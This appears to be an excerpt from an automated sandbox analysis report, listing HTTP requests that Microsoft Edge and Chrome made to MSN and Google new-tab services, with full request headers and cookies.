Source: global traffic HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=09C025F5A71D6FE2180F319FA60A6E8D&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=8684241135348538038&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=9f1acaf966844b9dbc23515752f37c75 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/scroll-down-button.7d3c287bfff87e892176.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /service/news/feed/pages/ntp?User=m-09C025F5A71D6FE2180F319FA60A6E8D&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&adsTimeout=600&apikey=0QfOX3Vn51YCzitbLaRkTTBadtWpgTN8NZLW0C1SEM&audienceMode=adult&backgroundImageIsSet=false&cm=en-us&column=c3&cookieWallPresent=false&disablecontent=true&infopaneCount=17&it=app&memory=8&mobile=false&newsSkip=0&newsTop=48&ocid=anaheim-ntp-feeds&pgc=547&scn=APP_ANON&timeOut=1000&vpSize=1232x876&wposchema=byregion HTTP/1.1Host: assets.msn.comConnection: keep-aliveads-referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"OneSvc-Uni-Feat-Tun: EdgeInterestTier1Ids:null;LoginState:NA;Product:anaheim;PageName:default;PageType:dhp;OCID:msedgdhp;ViewPortWidth:1280;ViewPortHeight:984;sec-ch-ua-mobile: ?0taboola-sessionId: initUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/float-button-group-wc.1fbacdb76725a2a98312.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-others.d5ad841de853beaad9e8.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-windows-widget-shared.134e79ef7864b4274fec.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/channel-store.5b917fd7b882726d8e58.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /1d6b80ab-342d-4031-8b17-fa7a415a779b/185e9ae8-e7e7-42c3-a20e-948d9a41b4bf.mp4 HTTP/1.1Host: prod-streaming-video-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://ntp.msn.com/Accept-Language: en-GB,en;q=0.9,en-US;q=0.8Range: bytes=753664-763446If-Range: "0x8DAB04A5AB12E2A"
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/edge-shopping.5219588f718ef6f70a47.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/common/icons/EditImageWhite.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/common/icons/PlayWhite.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/background-gallery.b1efaf97a3eef2197024.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/common/icons/ZoomWhite.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_channel-page-utils_dist_UrlUtilities_js-libs_feed-layout_dist_Utils_js-libs_river-data-t-5c6710.8c7d0e28efea755d336f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /1d6b80ab-342d-4031-8b17-fa7a415a779b/185e9ae8-e7e7-42c3-a20e-948d9a41b4bf.mp4 HTTP/1.1Host: prod-streaming-video-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://ntp.msn.com/Accept-Language: en-GB,en;q=0.9,en-US;q=0.8Range: bytes=50176-753663If-Range: "0x8DAB04A5AB12E2A"
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_channel-page-utils_dist_UrlUtilities_js-libs_core_dist_interaction-tracker_MouseTracker_-01b350.30b0d21807d12cd8d7d2.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/cs-core-desktop_responsive-card_dist_index_js-libs_feed-layout_dist_Utils_js-libs_views-helpe-3fb136.ea4d6e1aa2bd59998ad3.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/card-actions-wc.8a1bb7315d1f3ad1dac6.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_js.6985524dca6d732452d7.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/diagnostic-web-vitals.c6eb8c640456acb68b9c.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/ocvFeedback.2a930d83a1ebb2ea4b2d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.75/asset?sv=2017-07-29&sr=c&sig=R83mlHRCqeHRG9T0loza5cz3U8zjuZzQy2wVvoSHGHw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-06-30T00%3A00%3A00Z&sp=r&assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/conditionalBannerWC.6d8019b2ba4ee047b8c5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-settings-edgenext.36872f7c5ce57a5d9c49.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/codex-bing-chat.d4705abeab944b647de2.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/super-coach-mark-wc.5ad8de935d24e6052658.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/waffle-wc.74c10742f08f983c2805.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-segments.11aff16404408a58d3d2.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/cs-core-desktop_card-components_dist_card-banner_index_js-cs-core-desktop_card-components_dis-cef191.888669d9cc0659b01a27.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_core_dist_interaction-tracker_MouseTracker_js-libs_weather-shared-wc_dist_utilities_entr-072035.11606a415b7b5f44447f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/welcomeGreetingLight.879b176ee540781e4e35.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_social-data-service_dist_service_SocialService_js.6a2e3b2d7b9c8b7b2133.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
